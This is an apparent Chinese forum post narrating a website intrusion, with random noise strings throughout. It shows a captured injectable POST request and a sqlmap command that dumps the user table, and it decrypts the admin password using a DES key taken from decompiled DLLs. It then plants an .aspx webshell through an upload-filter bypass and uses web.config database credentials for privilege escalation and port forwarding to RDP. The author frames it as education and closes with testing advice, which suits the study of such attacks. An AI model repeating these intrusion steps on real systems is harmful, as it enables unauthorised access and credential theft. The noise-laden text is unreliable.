|
7 ]6 n _. l: q; C: d 注:各位同仁,今天晚上主要防止被限号来凑个数字,这篇文章本来是给一个机构做科普的,所以写的有点怎么说,反正土司的人看了会骂哈哈,大家凑合的看,文中哪怕有那么一点半点东西,能给大家带来启发,那么我这个文章就没白发,所以大佬们轻点喷哈哈,嘴下留情哈哈。 1、POST注入猜解网站管理员账号密码 通过awvs扫描发现存在注入,直接在avws下的Scans---target下点击你扫描的过目标如图:
, K1 U+ M! I& g$ _9 N6 j
' a O7 Z0 P6 e, i% h \; [. C' l% {# ]! x' ?2 o
5 r2 G' ~8 m4 D7 w3 l% k ( F: g' m; @) }, L1 @
& y; o4 [- a' k1 p4 B+ d 然后点vulnerabilities,如图:
% p+ ]) `$ w; h5 G- C6 w; U1 @9 O - ^0 |4 _9 `0 d) o* l0 I7 w
& B3 E, M% r1 w
, }# c& Q5 _- I 4 \3 @0 F: ?/ o' s! N9 Y
" k# |7 V3 B: k6 W& z9 f3 Q6 ^
点SQL injection会看到HTTPS REQUESTS,如图:
- j0 k2 c8 F; E4 ~7 r8 i; d$ H/ P
3 G6 }+ i* u6 y; e% u' [, t4 ~9 S: R1 [9 D/ K, a" x6 j
 % o7 k, D' V" D% _- m& W
) W# `2 A4 G7 ]: ]& @
/ |$ P9 a# Z6 C& X% a
获取到http的数据包,如下: POST /Product/ProductHandler.ashx HTTP/1.1 Host: www.test.cn Cache-Control: no-cache Accept: text/plain, /; q=0.01 Origin: http://www.test.cn User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://www.test.cn/ Accept-Language: en-us,en;q=0.5 X-Scanner: Netsparker Accept-Encoding: gzip, deflate Content-Length: 157 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
7 }$ W: c; p/ r& }& S! T
$ a. N' z' X" `% u
4 Q4 q( V$ }! s. j% L' Y Type=GetProductList&pageIndex=3&pageSize=5&productType=*&supplierType=1 把以上post包保存到sqlmap根目录下,保存为1.txt,注入参数提前用awvs已经识别,注入参数是productType,注入命令为: sqlmap.py -r 1.txt --level 5 --risk 3 -p productType --dbms=mssql -D cci -T Zy_user -C u_loginname,u_loginpassword –dump 此sqlmap命令的意思是读取数据库cci下Zy_user表的用户名密码列名,dump就是保存下来的意思,会保存在./sqlmap/output下,以excel表格的格式保存着下载下来的表的内容。 注入用户名密码加密值如图:8 N7 G9 _8 {3 A1 i( Z
% t# t% B% Q0 J6 t/ A3 }$ |$ m/ q. X4 K2 B* R4 a* Z' a4 F/ A
 * I. c" m! k- J6 Q
2 ^6 z) B$ M" {' x% e7 l+ ]. Y8 R$ |' a& \+ c8 y2 e1 T
2、通过对bin目录dll进行反编译解密管理员加密值登录后台 通过前面的sql注入可获取网站后台账号和密码加密值,为了更深入的测试网站后台是否存在其他漏洞,需要黑盒测试模拟黑客攻击进一步测试,故对网站目录bin目录下的dll进行反编译来获取加密密匙,最终成功解密密码。 把bin目录下的dll全部加载到Reflector中,然后通过跟踪常用用户密码相关的类函数,得出如下结果:# f4 f9 h+ t7 F5 L6 A8 z$ c6 T- q; X
6 A6 Q& Y/ W/ W1 X# c+ p/ `7 _# _4 [" \# v5 m
 & J. R4 ?* `) G& N6 P
$ ]% u! h2 f1 g. W2 i* F. e
# f, m/ @5 D [4 B4 l0 s  9 |9 j3 C7 a) E* {9 W9 K
; ]/ y* w2 U# u# \/ Q
; C, M2 e# Z8 }" V' i J/ s
得知密钥是fkue且为des加密,接着定位encrypt类函数找出其解密方式如图:
7 h2 {6 u4 O5 a6 C% A! o! f5 ? ' ]4 K/ R; D5 I1 u$ ~; J
0 R$ b, b* B, P5 L  3 H3 e, q8 c5 h W$ L
* F! Q* U$ i- o
4 y; @6 H# W5 i4 P' ]
解密方式是把fkue使用md5进行加密,然后取32位md5加密值的前8位作为加密密钥,如图:3 G2 O: K0 O; K' ^! Z7 h7 K9 W) D
$ T- q$ f: k4 F5 q* H: m o
, }, [0 d0 b% G0 s3 t0 M  5 W3 e, l! y! Z% K$ I; _8 b. M
/ o- Y% j9 p% X' s/ _) O9 X. v. {- u
6 a& M: M. J u: H6 d
通过在线解密网站解密得知加密密钥就是:1110AF03。 前面sql注入步骤已经成功获取admin的加密值,如图:
; d/ A* e4 v1 k( z0 G% X; _
3 A$ J( Q! a6 W s3 [2 w' e% F; L7 K. J$ C
 : o3 }2 _8 p O$ t
$ D7 T |( @- e- g4 T' G
! E B2 ^4 n. m 解密admin管理员密码如图:6 }7 ^; B; i6 w
! k- }& Z3 P% R8 D* k0 d0 m1 p
0 c4 e. B4 ]- s9 j# e3 z
 % u1 t9 I: i. q
) T' y: G0 _3 l: j. h8 w% N. L j' `
然后用自己写了个解密工具,解密结果和在线网站一致2 s- N [: f4 T; p
: P) i* Z; M, Y5 Q% }: T' I
& g$ b8 h' k4 t) g* U- A& x 
, I7 w5 E# w/ D# x
' u6 ?' z( w. n" p. E' ]8 Q% C
5 j/ P0 m1 T9 D3 o) R' _/ o 解密后的密码为:123mhg,./,登陆如图:/ s) N& N+ [+ N+ x; m" z
) {3 W7 k; Q# I/ E( G2 C1 y3 L6 {2 w+ H; K
 2 s, X9 e* _' J- \' {# p- d" l9 _
7 v( s, s9 t8 M2 [7 J
8 {, W+ y/ K1 H4 s: D8 n1 ~ 3、后台上传绕过漏洞getwebshell如图: 登陆后台后,在添加信息处,会有上传图片的功能,随后使用burpsuite抓包如下图:3 J$ q( F# g, [
( K: }- s( C# w5 E4 y
, ?7 X) E- c( W, E
. L. j( m; I @/ e9 R g
' g: g$ [% y" y
. B/ H! H5 w- n4 r6 `' ^7 ] 
3 J {7 ~: k' u2 c- q ( H% j! x7 h6 R6 I, \
; z1 [8 N) n/ @+ U$ b4 n
绕过上传限制,只需要把包里的filename的1.jpg改为1.aspx,即可成功上传webshell,如下图:8 y0 K( {& S; e4 w
; q) c) S4 O C: Y
% S- |1 F+ Z" F 
0 ]( y' v' L# e1 d0 o' Z ! C; Y' c8 R+ O9 O* _. v
+ h. x) f' r5 |7 B( l" R M+ f 访问webshell如下图:( b; ]& l1 I1 r c6 J# I! S
3 X+ i Y* _5 O9 X
3 v$ v* x A+ m5 s. u) I" ]
8 }+ e! b$ w. z ! f) |& L. C3 X2 J
8 ?) b. w1 ^' ^8 t) _2 x
4、前台任意上传漏洞getwebshell 在目标站前台有注册账号功能,注册成功后,同样在上传图片处可直接上传webshell,链接为http://www.test.cn/userRegister.aspx,登录如图:0 ?/ C9 \0 q* h( q& e6 G
j( W7 A4 b8 t/ \2 t9 _6 T& A
+ W" K& p5 M+ D0 k" d) {% `  ; G/ f% {1 l5 ]3 D5 ^3 n/ P( [
' O! G2 Y$ V1 ~# c2 e3 W3 S1 P- s8 @8 p* n6 j {: r
在上传证件或者头像的处可直接上传aspx 后缀的webshell,上传成功后,点右键-属性,可查看上传后的webshell路径为:http://www.test.cn/Admin/upload/demo.aspx 然后登录如图:
/ ^" W1 Y& K7 l) c# }: ~' V, \ M" c
. h1 J! c) O4 m4 j4 ^" }- X- z+ u3 C5 J& S$ u) O, C2 I. d) F
 & d8 r" I9 f C* S
8 Q2 e C" u' D. Z4 K' ^, f5 n0 F' C) {( r( O2 m
通过查看网站路径下的web.config文件得到mssql数据库配置账号为sa的密码并且以windows身份认证配置的系统登录账号密码如图:8 G* E3 N' y5 O4 U& W
( Y. o c" A5 M: U2 s; B2 r
) W: P; u% e# }( N+ H* Z 
1 y$ ~; v7 L3 T" n% r7 [% S
& ~ E$ `- F) y! D5 g9 o* R; l. P8 o; [8 ^& b: B
可直接利用mssql sa权限执行系统命令添加管理员账号密码或者直接利用Windows登录密码webshell下利用lcx内网端口转发登陆3389。
" X; S; w- s7 q+ P; K; d3 A' W % U+ Y# z0 @, w/ D5 Y9 N v
4 K% z# V+ o' e9 n" k* ~" L
总结:一套程序不应该只考虑其美观与功能强大,是要在满足安全的前提下再同时满足美观与功能。建议各个单位在系统上线之前,条件允许的情况下,首先进行白盒测试,其次进行黑盒测试,再次进行灰盒测试。如果通过白、黑、灰发现安全问题,那么就要再进行一轮这样的测试,直到系统难以被发现安全问题,然后再进行上线。特别是一些政府、企事业单位,数据面涉及基础人口等敏感数据,一旦遭到黑客攻击被泄露,给国家带来的损失是无法挽回的。好了以上就是今天分享的渗透内容,谢谢大家的收看!
3 N$ {: X0 L! C- @! k9 C1 f 8 D! P1 H2 @/ F' Q! J# l& X& |
, D, s8 E4 Q3 E( i+ B7 J% b
) w2 M+ [# |/ `5 M( J $ s9 c) `8 W6 r( \! G
| 
发表于 2023-11-28 20:23:22
收藏
支持
反对